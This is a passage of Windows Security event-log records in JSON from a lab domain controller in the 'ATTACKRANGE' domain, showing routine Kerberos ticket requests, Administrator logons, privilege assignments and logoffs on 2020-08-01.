codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220609,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220610,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220611,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E10C\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e10c","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220612,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E10C\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x8e10c","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220613,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7F994\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7f994","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220614,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80FDE\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x80fde","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220615,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E10C\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e10c","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220616,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220617,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220618,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220619,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E14B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e14b","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220620,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E14B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x8e14b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220621,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E14B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e14b","LogonType":"3","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220622,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
